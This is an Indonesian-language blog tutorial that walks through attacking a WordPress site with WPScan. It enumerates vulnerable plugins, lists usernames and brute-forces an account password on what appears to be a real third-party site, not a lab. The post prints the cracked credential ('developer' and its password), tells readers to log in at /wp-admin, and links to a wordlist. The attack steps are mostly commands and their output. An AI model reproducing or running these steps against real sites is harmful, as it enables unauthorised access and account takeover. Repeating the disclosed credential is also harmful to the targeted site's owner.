Enumerate/Hack wordpress site dengan wpsan.rb

Januari 18, 2013

<div><div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://wpscan.org/">Download WPScan</a> 
 
kata developernya,,tools ini gak support di Windows OS gan, tpi coba agan baca README nya siapa tw aja ada solusi klo di Windows 
 
gak usah kebanyakan bacot gan. 
tutor ini ane tujukan kpd Backtrackers dan Linux user 
 
1. buka wpscan.rb (/pentest/web/wpscan ) 
2. ketik wpscan.rb ,,trus enter. biasanya ditanya mw update atau kagak,,klo kagak ente ketik n klo mw update ketik y. 
klo agan milih y,trus udah selesai updatenya,,biasanya muncul error kya gini pas buka wpscan.rb

</div>
</div>
<pre class="brush">root@bt:/pentest/web/wpscan# ./wpscan.rb -h
[ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/
#<LoadError: no such file to load -- nokogiri></pre>
</div>
solusinya udah ada di error messagenya gan, tinggal ketik ini :

<pre class="brush">gem install --user-install nokogiri</pre>
3. Klo udah cobe ketik ./wpscan.rb atau /wpscan.rb --help
ntar munucl tuh option2nya 
 
4. Masukin url dan pilih option lainnya, misalkan ane mw liat2 pluginnya yg vuln : 
 
<pre class="brush">./wpscan.rb --url www.productbestbuy.com --enumerate p!</pre>
tinggal tunggu, ntar muncul plugin2 yg vuln

<pre class="brush">[+] We found 1 plugins:

| Name: jetpack
 | Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/
 | Directory listing enabled? Yes.
 |
 | [!] jetpack plugin SQL Injection Vulnerability
 | * Reference: http://www.exploit-db.com/exploits/18126/

[+] Finished at Sun Dec 30 21:56:44 2012</pre>
tuh gan,,malah dikasih exploitnya juga 
5. skarang coba ane cari username nya :

<pre class="brush">./wpscan.rb --url www.productbestbuy.com --enumerate u</pre>
dan tinggal tunggu aja,,ntar keluar tuh username2 yg ada di databasenya

<pre class="brush">[+] Enumerating usernames ...

We found the following 2 username/s :

admin
 developer</pre>
6. skarang nyari password nya pke brute force, di tools ini kita cuma bisa pke teknik brute force untuk nyari passnya gan,,jdi inet hrus cepet dan hrus punya modal keberuntungan. dan yg pling penting harus sediain wordlist.lst bejibun gan. Wordlist ane letaknya di /root/Desktop/wordlist.lst

<pre class="brush">./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst</pre>
dan hasilnya :

<pre class="brush">[+] Starting the password brute forcer

Brute forcing user 'developer' with 12 passwords... 58% complete.
  [SUCCESS] Username : developer Password : cisadane123456

[+] Finished at Sun Dec 30 22:38:18 2012</pre>
wkwkw,,beruntung banget ane, pass langsung tembus

nemu tuh gan,, 
 
Username : developer Password : cisadane123456[/code] 
 
tinggal login aja gan.,site wp secara default loginnya ada di folder http://siteswp.com/wp-admin/ 
untuk download wordlist nya,,bisa lihat <a href="http://hacker-newbie.org/showthread.php?tid=10849">di sini gan</a> 
 
PIC: 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://sites.google.com/site/rieqyroot/files/hack_wp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="223" src="https://sites.google.com/site/rieqyroot/files/hack_wp.png" width="400" /></a></div>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
penulis : RieqyNS13 
wpscan developer : ethicalhacke3r 
 </div>
</div>
</div>
</div>

2 komentar

Anonim26 Maret 2013 pukul 09.14
heker | o |
BalasHapus
Balasan
Unknown27 Juni 2016 pukul 01.04
harus pake linux ya ?
BalasHapus
Balasan

Tambahkan komentar

Fudanshi

Enumerate/Hack wordpress site dengan wpsan.rb

Recent Big Posts

Categories

Tags Cloud

Comments

Latest

Random

Flickr

4/Food

Popular Posts